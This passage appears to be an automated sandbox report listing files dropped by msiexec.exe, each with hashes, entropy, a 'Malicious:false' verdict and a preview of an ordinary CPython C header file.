                                                                                                                                Preview:#ifndef Py_CPYTHON_DESCROBJECT_H..# error "this header file must not be included directly"..#endif....typedef PyObject *(*wrapperfunc)(PyObject *self, PyObject *args,.. void *wrapped);....typedef PyObject *(*wrapperfunc_kwds)(PyObject *self, PyObject *args,.. void *wrapped, PyObject *kwds);....struct wrapperbase {.. const char *name;.. int offset;.. void *function;.. wrapperfunc wrapper;.. const char *doc;.. int flags;.. PyObject *name_strobj;..};..../* Flags for above struct */..#define PyWrapperFlag_KEYWORDS 1 /* wrapper function takes keyword args */..../* Various kinds of descriptor objects */....typedef struct {.. PyObject_HEAD.. PyTypeObject *d_type;.. PyObject *d_name;.. PyObject *d_qualname;..} PyDescrObject;....#define PyDescr_COMMON PyDescrObject d_common....#define PyDescr_TYPE(x) (((PyDescrObject *)(x))->d_type)..#define PyDescr_NAME(x) (((PyDescrObject *)(x))->d_name)....
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3402
                                                                                                                                Entropy (8bit):5.0102013418235565
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:pcTR1veuOeuOvuLK/aTVCSlDoPLCXoLE7PpPq3I:GN3OxO2ezCYsRC3I
                                                                                                                                MD5:8CF37E13255657E0F9B8B30320D9A352
                                                                                                                                SHA1:9046B0DB7483E9E65D1C68C37E5731139BCEBF0D
                                                                                                                                SHA-256:449F3E8B9CDA559B1AFAF0A5137BF008E5845BBB7D6D05D477EF02CCBEBE662D
                                                                                                                                SHA-512:6DFF3C3FA070898C425E20138EA6E089DF8191F2B4834514A3696928E968D2601CC3046197FB9F48C44B34159060A2EEAD30B28A5AFC35200652E6133AD7C063
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_DICTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct _dictkeysobject PyDictKeysObject;..typedef struct _dictvalues PyDictValues;..../* The ma_values pointer is NULL for a combined table.. * or points to an array of PyObject* for a split table.. */..typedef struct {.. PyObject_HEAD.... /* Number of items in the dictionary */.. Py_ssize_t ma_used;.... /* Dictionary version: globally unique, value change each time.. the dictionary is modified */.. uint64_t ma_version_tag;.... PyDictKeysObject *ma_keys;.... /* If ma_values is NULL, the table is "combined": keys and values.. are stored in ma_keys..... If ma_values is not NULL, the table is split:.. keys are stored in ma_keys and values are stored in ma_values */.. PyDictValues *ma_values;..} PyDictObject;....PyAPI_FUNC(PyObject *) _PyDict_GetItem_KnownHash(PyObject *mp, PyObject *key,.. Py_has
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):741
                                                                                                                                Entropy (8bit):5.169216337738856
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BLjF/HQxib2E5ZNE3VQvXjU3GJ+n2tKB8Otn9J+nyug7onyuHoCGEtfe5Jy:ljlwxibnNImjU3GJLUlnSg7IHBtky
                                                                                                                                MD5:D2B09B04F51E2EE2DDECDE511FA9BE6D
                                                                                                                                SHA1:72E751C22A3384BD44CDE35830FDDC539A15E103
                                                                                                                                SHA-256:77A85C587A7B9887C3D78A6153DEE9850FA4D6BF141A035BBB4B4FFB11122CDA
                                                                                                                                SHA-512:0218194000078573BF8CCFA6E69AB561D84BB2CC24AAD4C3C6376F07B8EA428597EA2927A28B9E06AF0D0DFC7BAEDAA2E4832CCEE6E8D1E99B2BF7760CCC54B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_FILEOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(char *) Py_UniversalNewlineFgets(char *, int, FILE*, PyObject *);..../* The std printer acts as a preliminary sys.stderr until the new io.. infrastructure is in place. */..PyAPI_FUNC(PyObject *) PyFile_NewStdPrinter(int);..PyAPI_DATA(PyTypeObject) PyStdPrinter_Type;....typedef PyObject * (*Py_OpenCodeHookFunction)(PyObject *, void *);....PyAPI_FUNC(PyObject *) PyFile_OpenCode(const char *utf8path);..PyAPI_FUNC(PyObject *) PyFile_OpenCodeObject(PyObject *path);..PyAPI_FUNC(int) PyFile_SetOpenCodeHook(Py_OpenCodeHookFunction hook, void *userData);....PyAPI_FUNC(int) _PyLong_FileDescriptor_Converter(PyObject *, void *);..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):240
                                                                                                                                Entropy (8bit):5.0072586187879855
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:BLgF9ov/HQxz2bBAERZHGdZXGEWyye8Ve67bJRCa8Bpey:BLoU/HQxib2EWbnW7LVPpy
                                                                                                                                MD5:77E359584D56C653096E3495E48F2A0A
                                                                                                                                SHA1:798CC7DEECC669D96019F53F3C633F78BEAFD8B8
                                                                                                                                SHA-256:BFD7F53CBA3C135801C129087BC84866312DD998ED7E1EC13B30CB2A800F3704
                                                                                                                                SHA-512:BAB6D1CCA957699CD282E5B1F415FBB92B51AFCE39A3B4B207E155010C34FE4D47AB2E17CF73332D10DA6239941A04C7144317F5436F71DEA927E9D8B5B0EE45
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_FILEUTILS_H..# error "this header file must not be included directly"..#endif....// Used by _testcapi which must not use the internal C API..PyAPI_FUNC(FILE*) _Py_fopen_obj(.. PyObject *path,.. const char *mode);..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):723
                                                                                                                                Entropy (8bit):5.221607790484444
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:BnR/HQxib2ERoxsy1F411ombIxtc/ayhmeMflYeMfeeKKOPEfOPhIfOPj:tJwxib+xsy341VGKm7q7mrPEWPhIWPj
                                                                                                                                MD5:0AEEA698198B23E2FFE27B1AEA63F2C5
                                                                                                                                SHA1:C85359E6FC326AE3571CED5307737FA2E7092C75
                                                                                                                                SHA-256:FB4F49E7AF404898731333AB4C77D07C5A6BFF436C744B4C6D80E93E668FEE36
                                                                                                                                SHA-512:C8DEFDCFC218D47E5821F821E94F40630BDFC05B1B93E540D98E80C58241A6AAECCD44AB60EB151F32C02933CC2927FD2A3F0F543F22FBB1BA11C525BB2799E6
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_FLOATOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_HEAD.. double ob_fval;..} PyFloatObject;....// Macro version of PyFloat_AsDouble() trading safety for speed...// It doesn't check if op is a double object...#define PyFloat_AS_DOUBLE(op) (((PyFloatObject *)(op))->ob_fval)......PyAPI_FUNC(int) PyFloat_Pack2(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack4(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack8(double x, char *p, int le);....PyAPI_FUNC(double) PyFloat_Unpack2(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack4(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack8(const char *p, int le);..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1137
                                                                                                                                Entropy (8bit):4.903757833245492
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GSqgwxibULip8ph97UX412U1YxYDKoO2TdGPzGlWmRl:GS7cgUumpouXeoDToz+Vb
                                                                                                                                MD5:5902B4A048F6428560A52A912B569AE7
                                                                                                                                SHA1:A565C1F713426F2D1CFF116395DBF9CA2C74E0E2
                                                                                                                                SHA-256:833C2CA6C489103C63DAA9701D2A3BD11E2EA14BAEB537A61D4CAB5D50493A7C
                                                                                                                                SHA-512:AC1F95FE7F017614B0BEDBED0B90AC829FD10A56D156310ECB3032CCF0180D8C5F61570FB8FAB873AB82853BDFCD858F70C8647FED7F052A025E574830E5B232
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Frame object interface */....#ifndef Py_CPYTHON_FRAMEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Standard object interface */....PyAPI_FUNC(PyFrameObject *) PyFrame_New(PyThreadState *, PyCodeObject *,.. PyObject *, PyObject *);..../* The rest of the interface is specific for frame objects */..../* Conversions between "fast locals" and locals in dictionary */....PyAPI_FUNC(void) PyFrame_LocalsToFast(PyFrameObject *, int);..../* -- Caveat emptor --.. * The concept of entry frames is an implementation detail of the CPython.. * interpreter. This API is considered unstable and is provided for the.. * convenience of debuggers, profilers and state-inspecting tools. Notice that.. * this API can be changed in future minor versions if the underlying frame.. * mechanism change or the concept of an 'entry frame' or its semantics becomes.. * obsolete or outdated. */....PyAPI_FUNC(int) _PyFrame_IsEntryFrame(PyFrameObjec
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4537
                                                                                                                                Entropy (8bit):5.101260959973866
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:OF6C/6XPrNI1XkYPTvrH3EBzpEBbEwCE7pEl2kpN+OdaN47+6rYC34t2g84H4wvO:c6CCRt6TUwqm+lNpNF8rUYuIzIx7tf
                                                                                                                                MD5:05A4E5A1A68C802A798A9C543368FBA3
                                                                                                                                SHA1:A656F8957C7AC34E65BEF6019D7B8F864E826A9E
                                                                                                                                SHA-256:0049AA0A5B6E449A6E576FAD283CAC58C3D5CCC67631D62AB3837D04134DE71E
                                                                                                                                SHA-512:EC3B14374A8FAD6EBF9EA286A31662DFD87635825917D1728F77BC87479FCFB7DD789A4678E10CDB3F882D31092163D4238F12E6CD05D9A0960F972C736C8FD2
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Function object interface */....#ifndef Py_LIMITED_API..#ifndef Py_FUNCOBJECT_H..#define Py_FUNCOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif......#define COMMON_FIELDS(PREFIX) \.. PyObject *PREFIX ## globals; \.. PyObject *PREFIX ## builtins; \.. PyObject *PREFIX ## name; \.. PyObject *PREFIX ## qualname; \.. PyObject *PREFIX ## code; /* A code object, the __code__ attribute */ \.. PyObject *PREFIX ## defaults; /* NULL or a tuple */ \.. PyObject *PREFIX ## kwdefaults; /* NULL or a dict */ \.. PyObject *PREFIX ## closure; /* NULL or a tuple of cell objects */....typedef struct {.. COMMON_FIELDS(fc_)..} PyFrameConstructor;..../* Function objects and code objects should not be confused with each other:.. *.. * Function objects are created by the execution of the 'def' statement... * They reference a code object in their __code__ attribute, which is a.. * purely syntactic object, i.e. nothing more than a compiled version of some.. * source
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3367
                                                                                                                                Entropy (8bit):4.612639010581012
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:7XdBTUlI/VuHcOaobPC7T42jyYtkbrwvr3Bb4:zdBayVAiWPUfTtk++
                                                                                                                                MD5:EA5516AB38A1FC833E0F71D827A4D879
                                                                                                                                SHA1:DD4B0303512B75F126AE5B0331D85262AC709F4B
                                                                                                                                SHA-256:BC19EB5393341EA6DA58665B386671229669DF2A4D90C1D2AD08B05ACC5ED46E
                                                                                                                                SHA-512:7B17670061720FCCACD20B5A5A4614F27F2BB29DB8A75970B29CAA3B78827131BE42287291F42236B6B658F3B544E9FA5C86810D2052AC7303690C346C43D909
                                                                                                                                Malicious:false
                                                                                                                                Preview:/* Generator object interface */....#ifndef Py_LIMITED_API..#ifndef Py_GENOBJECT_H..#define Py_GENOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* --- Generators --------------------------------------------------------- */..../* _PyGenObject_HEAD defines the initial segment of generator.. and coroutine objects. */..#define _PyGenObject_HEAD(prefix) \.. PyObject_HEAD \.. /* The code object backing the generator */ \.. PyCodeObject *prefix##_code; \.. /* List of weak reference. */ \.. PyObject *prefix##_weakreflist; \.. /* Name of the generator. */ \.. PyObject *prefix##_name; \.. /* Qualified name of the generator. *
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1571
                                                                                                                                Entropy (8bit):5.030696267833205
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:/wxibOvcHWcJQx1cof1oFjRYgGlw1svu4GRfs4G2aJaGR11k:/cgOvl3x1h9AewX/Cpk
                                                                                                                                MD5:5BD588710D90B879F7D2DD015605E64B
                                                                                                                                SHA1:A8BAAEB149110923016544C3E700795DA28D70D3
                                                                                                                                SHA-256:C6E2F4496E488374AC4EC1520F6B47363140C3016554220BE3CBD2A628BFEB9B
                                                                                                                                SHA-512:D607A105B45FF4DCBA212DB0246AD62E139A256A8C41B270A7790C1F01B91A4224033A16064123F034E741E4FFE76EADF63A70954CB13BDA9F7F0ACB7DC0EA78
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_IMPORT_H..# error "this header file must not be included directly"..#endif....PyMODINIT_FUNC PyInit__imp(void);....PyAPI_FUNC(int) _PyImport_IsInitialized(PyInterpreterState *);....PyAPI_FUNC(PyObject *) _PyImport_GetModuleId(_Py_Identifier *name);..PyAPI_FUNC(int) _PyImport_SetModule(PyObject *name, PyObject *module);..PyAPI_FUNC(int) _PyImport_SetModuleString(const char *name, PyObject* module);....PyAPI_FUNC(void) _PyImport_AcquireLock(void);..PyAPI_FUNC(int) _PyImport_ReleaseLock(void);....PyAPI_FUNC(int) _PyImport_FixupBuiltin(.. PyObject *mod,.. const char *name, /* UTF-8 encoded string */.. PyObject *modules.. );..PyAPI_FUNC(int) _PyImport_FixupExtensionObject(PyObject*, PyObject *,.. PyObject *, PyObject *);....struct _inittab {.. const char *name; /* ASCII encoded string */.. PyObject* (*initfunc)(void);..};..PyAPI_DATA(struct _inittab *) PyImport_Inittab;..PyAPI_FUNC(int)
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8074
                                                                                                                                Entropy (8bit):5.022024618625247
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:iauayXtV/fW/VTKNBfwKdfNy+1yQfAH+E22i+xO+haFl/8RCFtCFJkcr0pu7VOrH:B6ZmK3FyXK21Hb7VCH0e
                                                                                                                                MD5:7374CAE74FA7B008061024A8B0390A82
                                                                                                                                SHA1:B964DBF9B53FD29D68259966226712B7C3175830
                                                                                                                                SHA-256:07920E2E2D5225181673A5DAA22A9FE1727F8076376D873C03A9D929F29B11FC
                                                                                                                                SHA-512:57A87E05324EEAE27293CBBAF6C864D25016F9783D61D87AFBEC46DA7EFF9095B2CC96D4692520A1432477983604B2E00DE3E0EDA1AE61CA2BCD66906ACF6D36
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_PYCORECONFIG_H..#define Py_PYCORECONFIG_H..#ifndef Py_LIMITED_API..#ifdef __cplusplus..extern "C" {..#endif..../* --- PyStatus ----------------------------------------------- */....typedef struct {.. enum {.. _PyStatus_TYPE_OK=0,.. _PyStatus_TYPE_ERROR=1,.. _PyStatus_TYPE_EXIT=2.. } _type;.. const char *func;.. const char *err_msg;.. int exitcode;..} PyStatus;....PyAPI_FUNC(PyStatus) PyStatus_Ok(void);..PyAPI_FUNC(PyStatus) PyStatus_Error(const char *err_msg);..PyAPI_FUNC(PyStatus) PyStatus_NoMemory(void);..PyAPI_FUNC(PyStatus) PyStatus_Exit(int exitcode);..PyAPI_FUNC(int) PyStatus_IsError(PyStatus err);..PyAPI_FUNC(int) PyStatus_IsExit(PyStatus err);..PyAPI_FUNC(int) PyStatus_Exception(PyStatus err);..../* --- PyWideStringList ------------------------------------------------ */....typedef struct {.. /* If length is greater than zero, items must be non-NULL.. and all items strings must be non-NULL */.. Py_ssize_t length;.. w
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1820
                                                                                                                                Entropy (8bit):5.190323952258086
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:AYcgY6KnfJmLw0ePJZoAsYN+y3WIkY8o1Q:xc0Kn0LEPJZofoB3WJVoC
                                                                                                                                MD5:43E5FC0E1CB540ACB411A3726E90C18D
                                                                                                                                SHA1:B0C1B9BFC5CA7F1B2E066D3874A205668317B587
                                                                                                                                SHA-256:133395FC49C303DDDCC45D35E22A228E9A87E24D848D8F1985B52F306670AAE6
                                                                                                                                SHA-512:21B60EA9C30E2839ABA5C098AE1D56D8968A569AD4411248C39765FC30CB8B3C26CF914AE9F926F5998D5278763F9A46452892084A1F27952B6F18B0DA8F7227
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_LISTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. /* Vector of pointers to list elements. list[0] is ob_item[0], etc. */.. PyObject **ob_item;.... /* ob_item contains space for 'allocated' elements. The number.. * currently in use is ob_size... * Invariants:.. * 0 <= ob_size <= allocated.. * len(list) == ob_size.. * ob_item == NULL implies ob_size == allocated == 0.. * list.sort() temporarily sets allocated to -1 to detect mutations... *.. * Items must normally not be NULL, except during construction when.. * the list is not yet visible outside the function that builds it... */.. Py_ssize_t allocated;..} PyListObject;....PyAPI_FUNC(PyObject *) _PyList_Extend(PyListObject *, PyObject *);..PyAPI_FUNC(void) _PyList_DebugMallocStats(FILE *out);..../* Cast argument to PyListObject* type. */..#define _PyList_CAST(op) \.. (assert(Py
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3729
                                                                                                                                Entropy (8bit):5.15633455805833
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:IfiDJToXS7dco/1uKXHLKdUJfC5JxkM8UrJ4okJ4HYzXy9RSyHTDKYP:OiDJUo4KXrKSyjkMWoNHYbmSKP
                                                                                                                                MD5:682349CDB11B2E30C8EC9D4367BD283B
                                                                                                                                SHA1:10ABDA371569868D051915D85A8D562E9F6026D6
                                                                                                                                SHA-256:9AACD815F39DB5DCAAF94F348C61E7B1A58312397AC4BE3A758337160B3265A6
                                                                                                                                SHA-512:13B50E796FB9F1B87FFD7A2088A2986CBB2A4431320042E71D3FB8238DD112A8078ECA2D3B67D61A82047A8B49F8AD4F467DC14E8A3D202CB318BECA0F0E4729
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_LIMITED_API..#ifndef Py_LONGINTREPR_H..#define Py_LONGINTREPR_H..#ifdef __cplusplus..extern "C" {..#endif....../* This is published for the benefit of "friends" marshal.c and _decimal.c. */..../* Parameters of the integer representation. There are two different.. sets of parameters: one set for 30-bit digits, stored in an unsigned 32-bit.. integer type, and one set for 15-bit digits with each digit stored in an.. unsigned short. The value of PYLONG_BITS_IN_DIGIT, defined either at.. configure time or in pyport.h, is used to decide which digit size to use..... Type 'digit' should be able to hold 2*PyLong_BASE-1, and type 'twodigits'.. should be an unsigned integer type able to hold all integers up to.. PyLong_BASE*PyLong_BASE-1. x_sub assumes that 'digit' is an unsigned type,.. and that overflow is handled by taking the result modulo 2**N for some N >.. PyLong_SHIFT. The majority of the code doesn't care about the precise.. value of PyLong_SHIFT, but t
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4627
                                                                                                                                Entropy (8bit):5.003863864539745
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:fcj9um0J3q3D21C8YjnNSUbK45MvgDrPFZ27GK5SbfTZYQF3QfkDKbko4:05/AYjn4I5MvgDrPFZ2NqfTZYQxQMDQK
                                                                                                                                MD5:4BDA46B44F7EF98381CF953758D812A4
                                                                                                                                SHA1:24100495D5C88B032F1041D621C10F6ADDCD0FE8
                                                                                                                                SHA-256:ACAE015BAAE34BA70DB0B2436A469314D0BDF7598F9C9A8387188E798A96DCBB
                                                                                                                                SHA-512:77C8DA08D45A8992070278EBB6A7D81EF68CC6D2CF029389ED8AFFA25CC02703ACC0C839C84ECD44733A0E1EC0CC2D408DECF13069ADB5DA00ACC27EBB9B3D78
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_LONGOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(int) _PyLong_AsInt(PyObject *);....PyAPI_FUNC(int) _PyLong_UnsignedShort_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedInt_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_UnsignedLongLong_Converter(PyObject *, void *);..PyAPI_FUNC(int) _PyLong_Size_t_Converter(PyObject *, void *);..../* _PyLong_Frexp returns a double x and an exponent e such that the.. true value is approximately equal to x * 2**e. e is >= 0. x is.. 0.0 if and only if the input is 0 (in which case, e and x are both.. zeroes); otherwise, 0.5 <= abs(x) < 1.0. On overflow, which is.. possible if the number of bits doesn't fit into a Py_ssize_t, sets.. OverflowError and returns -1.0 for x, 0 for e. */..PyAPI_FUNC(double) _PyLong_Frexp(PyLongObject *a, Py_ssize_t *e);....PyAPI_FUNC(PyObject *) PyLong_FromUn
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2630
                                                                                                                                Entropy (8bit):5.292761958398995
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:scgQlOn4dtx1HEvd7UEd7zE275lWIR24VRnEzapVnl9u8cnWIRe1FPEzapVnxUmy:scxT1HYd7U27z775MIR2wEgvPzIRgMgc
                                                                                                                                MD5:3F3537CBE4F1539AEBAFEE861DFFFB5C
                                                                                                                                SHA1:540C5163B9FC2F14AA789B39462565F9D5074BB1
                                                                                                                                SHA-256:4E354684BA8B463F00DDDD154B94B5A6429509DB378C71733E6186AFB2CFA433
                                                                                                                                SHA-512:0B6036478A656EAC35C9897122FD8041546F321CF093CE207FB2FE336E95B4A2AC2ADC5892488D12C2DBC5DED4CE75DED9DE55B9AD63220C8CEC885F7AEC8ADB
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_METHODOBJECT_H..# error "this header file must not be included directly"..#endif....// PyCFunctionObject structure....typedef struct {.. PyObject_HEAD.. PyMethodDef *m_ml; /* Description of the C function to call */.. PyObject *m_self; /* Passed as 'self' arg to the C func, can be NULL */.. PyObject *m_module; /* The __module__ attribute, can be anything */.. PyObject *m_weakreflist; /* List of weak references */.. vectorcallfunc vectorcall;..} PyCFunctionObject;....#define _PyCFunctionObject_CAST(func) \.. (assert(PyCFunction_Check(func)), \.. _Py_CAST(PyCFunctionObject*, (func)))......// PyCMethodObject structure....typedef struct {.. PyCFunctionObject func;.. PyTypeObject *mm_class; /* Class that defines this method */..} PyCMethodObject;....#define _PyCMethodObject_CAST(func) \.. (assert(PyCMethod_Check(func)), \.. _Py_CAST(PyCMethodObject*, (func)))....PyAPI_DATA(PyTypeObject) PyCMethod_Type;....#define PyCMethod_C
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4341
                                                                                                                                Entropy (8bit):5.03697360916626
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:1cgcTYM7ZVGdUEuMkBM4BMquxKenelgecrUy2vM++wTw98UDw2w9/w2wFVh+UchZ:1cVTD7GWQ5e1+J20+3k+PaPF36bJ5ys
                                                                                                                                MD5:0BBEFAA66CA4AF53D084646CA2A630A1
                                                                                                                                SHA1:12828CDF39D960FCD7840A1E8F2983B891986BBA
                                                                                                                                SHA-256:16AB1B947E19F22415EBE26C80149F47487E281F7275697EE4FFC04D2BADB415
                                                                                                                                SHA-512:B1035FFF333EE3806A894C622D20FADB92E3FA1636BD8BCDECDCA3EA03C2B8553C640B2AE059DA5C89829C1CCE0D969A7273B1188FFFA372D6C8D237B6E5ACC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_MODSUPPORT_H..# error "this header file must not be included directly"..#endif..../* If PY_SSIZE_T_CLEAN is defined, each functions treats #-specifier.. to mean Py_ssize_t */..#ifdef PY_SSIZE_T_CLEAN..#define _Py_VaBuildStack _Py_VaBuildStack_SizeT..#else..PyAPI_FUNC(PyObject *) _Py_VaBuildValue_SizeT(const char *, va_list);..PyAPI_FUNC(PyObject **) _Py_VaBuildStack_SizeT(.. PyObject **small_stack,.. Py_ssize_t small_stack_len,.. const char *format,.. va_list va,.. Py_ssize_t *p_nargs);..#endif....PyAPI_FUNC(int) _PyArg_UnpackStack(.. PyObject *const *args,.. Py_ssize_t nargs,.. const char *name,.. Py_ssize_t min,.. Py_ssize_t max,.. ...);....PyAPI_FUNC(int) _PyArg_NoKeywords(const char *funcname, PyObject *kwargs);..PyAPI_FUNC(int) _PyArg_NoKwnames(const char *funcname, PyObject *kwnames);..PyAPI_FUNC(int) _PyArg_NoPositional(const char *funcname, PyObject *args);..#define _PyArg_NoKeywords(funcname, kwargs) \..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18816
                                                                                                                                Entropy (8bit):5.016077788122795
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:OkJzOe/34RrVeH7FeEKyH0qLIoZzSzYv8Z7v2L2Xku2enktIyUQB8q960fSv:OkpOg4eHXH0kzSzYvoD2L2Xku2enktIb
                                                                                                                                MD5:D5F8F3C8BB389BB9F6FD5EB74B2BA56A
                                                                                                                                SHA1:17557E5617E48A95C3C6CF6C86C62F150C81FC17
                                                                                                                                SHA-256:B0F2118953EBEE2302DB2ECBC3CBD7A39BBBC0280E5B113C7C88FD702D688FE5
                                                                                                                                SHA-512:8BEC8BCC0F0E8CBBE24AAB9062DA7A729049D4D86B856337A3C89201F5E79816BD1E2142379934A0F53F1B9481E40019AFC827D6E5B0BFAFD2380F94A67EABD3
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_OBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void) _Py_NewReference(PyObject *op);....#ifdef Py_TRACE_REFS../* Py_TRACE_REFS is such major surgery that we call external routines. */..PyAPI_FUNC(void) _Py_ForgetReference(PyObject *);..#endif....#ifdef Py_REF_DEBUG..PyAPI_FUNC(Py_ssize_t) _Py_GetRefTotal(void);..#endif....../********************* String Literals ****************************************/../* This structure helps managing static strings. The basic usage goes like this:.. Instead of doing.... r = PyObject_CallMethod(o, "foo", "args", ...);.... do.... _Py_IDENTIFIER(foo);.. ..... r = _PyObject_CallMethodId(o, &PyId_foo, "args", ...);.... PyId_foo is a static variable, either on block level or file level. On first.. usage, the string "foo" is interned, and the structures are linked. On interpreter.. shutdown, all strings are released..... Alternatively, _Py_static_string allows
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3087
                                                                                                                                Entropy (8bit):5.068757268058537
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:5cbM6X5OvxrVN2TCjPKsTW7QALGsL2V+F7I2r:2bMYovzN2T5sT0Q2CV+FM2r
                                                                                                                                MD5:DAD077C4E80777963274425E6E0D823A
                                                                                                                                SHA1:222BB6D0672146341793B52693772B794893A2DD
                                                                                                                                SHA-256:F73D045499719AB10C11538DB96DB6832FE0E2CB9E038ED184B759C865BF2327
                                                                                                                                SHA-512:A6AEE3CEC0F8119A6246A49FC99CC9D80A11353C7AA6A62637669DCFBC238BF2CD2DE98F42BB61595471B0E541415205D498BA281FBB5EAE5DB9A631078EBAFF
                                                                                                                                Malicious:false
                                                                                                                                Preview:#ifndef Py_CPYTHON_OBJIMPL_H..# error "this header file must not be included directly"..#endif....#define _PyObject_SIZE(typeobj) ( (typeobj)->tp_basicsize )..../* _PyObject_VAR_SIZE returns the number of bytes (as size_t) allocated for a.. vrbl-size object with nitems items, exclusive of gc overhead (if any). The.. value is rounded up to the closest multiple of sizeof(void *), in order to.. ensure that pointer fields at the end of the object are correctly aligned.. for the platform (this is of special importance for subclasses of, e.g.,.. str or int, so that pointers can be stored after the embedded data)..... Note that there's no memory wastage in doing this, as malloc has to.. return (at worst) pointer-aligned memory anyway...*/..#if ((SIZEOF_VOID_P - 1) & SIZEOF_VOID_P) != 0..# error "_PyObject_VAR_SIZE requires SIZEOF_VOID_P be a power of 2"..#endif....#define _PyObject_VAR_SIZE(typeobj, nitems) \.. _Py_SIZE_ROUND_UP((typeobj)->tp_basicsize + \.. (n
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1342
                                                                                                                                Entropy (8bit):5.1830587849954055
                                                                                                                                Encrypted:false
